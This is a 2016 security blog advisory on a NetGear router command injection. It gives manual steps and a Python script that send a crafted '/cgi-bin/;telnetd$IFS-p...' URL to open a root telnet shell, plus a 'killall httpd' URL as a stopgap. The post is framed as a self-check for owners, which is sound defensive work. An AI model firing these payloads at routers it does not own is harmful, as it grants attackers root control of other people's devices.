Kalypto (in)Security

Research, demonstrations, and popcorn.

NetGear Vulnerability Expanded

A vulnerability was discovered in some NetGear routers that allows remote command execution. Because the injection rides on an ordinary HTTP GET request, the victim's own browser can be made to send it: visiting a malicious site, or a legitimate site that serves a malicious ad via AdSense or any of a number of other ad services, is enough.

The vulnerability allows execution of Linux commands by simply appending the command to a URL on the router's web interface.  The commands execute with root privileges (god mode, for non-technical people).  This can be used to start a telnet or FTP server, command your router to attack other computers, or do pretty much anything else the malicious user wants to do.

As of the writing of this article, there have been no official patches released by NetGear, and most news organizations reporting on this vulnerability are giving incorrect information.  Most have stated that only the R7000 and R6400 are vulnerable.  THIS IS INCORRECT.  I have tested all models below, with the exception of the R9000, and have found them to be vulnerable.

If you are running any of the following routers, please check if your router is vulnerable by following the directions below.  If you are vulnerable, please discontinue use until NetGear releases a patch.

  • NetGear AC1750-Smart WiFi Router (Model R6400)
  • NetGear AC1900-Nighthawk Smart WiFi Router (Model R7000)
  • NetGear AC2300-Nighthawk Smart WiFi Router with MU-MIMO (Model R7000P)
  • NetGear AC2350-Nighthawk X4 AC 2350 Dual Band WiFi Router (Model R7500)
  • NetGear AC2600-Nighthawk X4S Smart WiFi Gaming Router (Model R7800)
  • NetGear AC3200-Nighthawk AC3200 Tri-Band WiFi Router (Model R8000)
  • NetGear AC5300-AC5300 Nighthawk X8 Tri-Band WiFi Router (Model R8500)
  • NetGear AD7200-Nighthawk X10 Smart WiFi Router (R9000)

If you would like to test if your specific router is vulnerable, please follow the commands below.  If it is found to be vulnerable, please disconnect it from the network and power it off until a patch is released by NetGear.

  1. In a browser navigate to http://192.168.1.1/cgi-bin/;telnetd$IFS-p$IFS'56789'
    Make sure to replace 192.168.1.1 with your router’s IP address.  ($IFS is the shell’s field-separator variable; it stands in for a space so the command survives as part of the URL.)  You will just get a white or gray screen depending on the browser.
  2. Open a command prompt (Win+R > cmd).
  3. Type the following into the command prompt:  telnet 192.168.1.1 56789
    Replace the IP with your router’s IP address.  If you get a message saying telnet is not a valid command, you will need to install the telnet client by going to Control Panel > Programs and Features > Turn Windows Features on or off > Check TELNET Client.
  4. If your router is vulnerable, you will drop straight into a root shell on the router.

    If you do not get a shell, your router is likely not on a version of the firmware that is vulnerable.  As of this writing, all of the newest firmware released by NetGear is vulnerable for the listed devices.
  5. To kill the telnet process you will need the process ID for telnetd.  Type the following: ps | grep telnet

    This will list the processes with telnet in the command.  The one you want is the one that shows telnetd -p 56789 (or whatever port you used).  The process ID is the number in the far-left column.
  6. Type the following command:  kill <process_id> (replacing <process_id> with the number displayed in step 5).
  7. After pressing enter, telnetd is killed (which also ends your telnet session) and you can continue on to disconnect your router from the network until a patch is released by NetGear.

Alternatively, you could execute the following command after every reboot of the router and it will kill the web interface altogether.  Since httpd is also what processes the injected URL, this closes the hole as a side effect, but only until the next reboot.  If you need to manage your router, just reboot it, do what you need to, and then execute this command again to kill the web interface:

http://192.168.1.1/cgi-bin/;killall$IFS'httpd'
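As an added example (this is not code from the original post), the following Python script automates the check in steps 1 through 4 and the PID lookup in steps 5 and 6, and also builds the httpd-kill URL above.  The script name netgear_check.py, the function names, and the sample ps output embedded in it are my own; the router address defaults to 192.168.1.1 and the port to 56789 as in the manual steps, and both can be changed.

```python
"""netgear_check.py: automated check for the NetGear /cgi-bin/ command injection.

Added example, not code from the original post. It requests the same
injection URL the manual steps use, tests whether telnetd is now
listening, and parses BusyBox `ps` output for the cleanup step.
The router address, the port and PS_SAMPLE are assumptions/constructed.
"""
import re
import socket
import urllib.error
import urllib.request
from typing import Optional

# $IFS (the shell's field separator) stands in for a space so the
# injected command survives inside the URL path.
IFS = "$IFS"


def probe_url(router_ip: str, port: int = 56789) -> str:
    """URL that makes a vulnerable router start telnetd on `port` (step 1)."""
    return f"http://{router_ip}/cgi-bin/;telnetd{IFS}-p{IFS}'{port}'"


def kill_httpd_url(router_ip: str) -> str:
    """URL that stops the router's web server until its next reboot."""
    return f"http://{router_ip}/cgi-bin/;killall{IFS}'httpd'"


def port_open(host: str, port: int, timeout: float = 3.0) -> bool:
    """True if a TCP connection to host:port succeeds within `timeout`."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:
        return False


def check_router(router_ip: str, port: int = 56789, timeout: float = 5.0) -> bool:
    """Return True if visiting the probe URL opened telnetd on `port`.

    The port is checked before the request so that something already
    listening there is not mistaken for a successful injection.
    """
    if port_open(router_ip, port, timeout):
        raise RuntimeError(f"{router_ip}:{port} is already open; pick another port")
    try:
        # Only the side effect matters; the page body is blank either way.
        urllib.request.urlopen(probe_url(router_ip, port), timeout=timeout).close()
    except urllib.error.HTTPError:
        pass  # an HTTP error status does not tell us whether the command ran
    except (urllib.error.URLError, OSError) as exc:
        raise RuntimeError(f"could not reach {router_ip}: {exc}") from exc
    return port_open(router_ip, port, timeout)


# BusyBox ps prints the PID in the first column and the command last (step 5).
PS_LINE = re.compile(r"^\s*(\d+)\s+.*\btelnetd\b.*-p\s*(\d+)")

# Constructed sample of `ps` output from the router shell (not captured
# from a real device); the header and the grep line must be skipped.
PS_SAMPLE = """\
  PID USER       VSZ STAT COMMAND
 1288 root      1320 S    telnetd -p 56789
 1301 root      1316 S    grep telnet
"""


def telnetd_pid(ps_output: str, port: int) -> Optional[int]:
    """PID of the telnetd bound to `port`, or None if none is running (step 6)."""
    for line in ps_output.splitlines():
        match = PS_LINE.match(line)
        if match and int(match.group(2)) == port:
            return int(match.group(1))
    return None


if __name__ == "__main__":
    import sys

    ip = sys.argv[1] if len(sys.argv) > 1 else "192.168.1.1"
    if check_router(ip):
        print(f"{ip} is VULNERABLE: telnetd is listening on port 56789.")
        print(f"Connect with `telnet {ip} 56789`, run `ps | grep telnet`, kill the "
              "telnetd PID, then unplug the router until NetGear releases a patch.")
    else:
        print(f"{ip} did not open the port; it is probably not on vulnerable firmware.")
```

Run it from a machine on the router's LAN (`python3 netgear_check.py 192.168.1.1`).  The script does not stop the telnetd it starts; that is still steps 5 and 6 over telnet, and `kill_httpd_url` is the same stopgap as above, which does not survive a reboot.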


UPDATE:  NetGear has updated their KB listing the affected devices.  They have released BETA firmware for the R6400, R7000, and R8000 that resolves the issue.  The BETA firmware will be replaced with the final version once it is fully tested.  If you would like to download their BETA firmware, head on over to their support site here:  http://kb.netgear.com/000036386/CVE-2016-582384?cid=wmt_netgear_organic


Kalypto • December 11, 2016

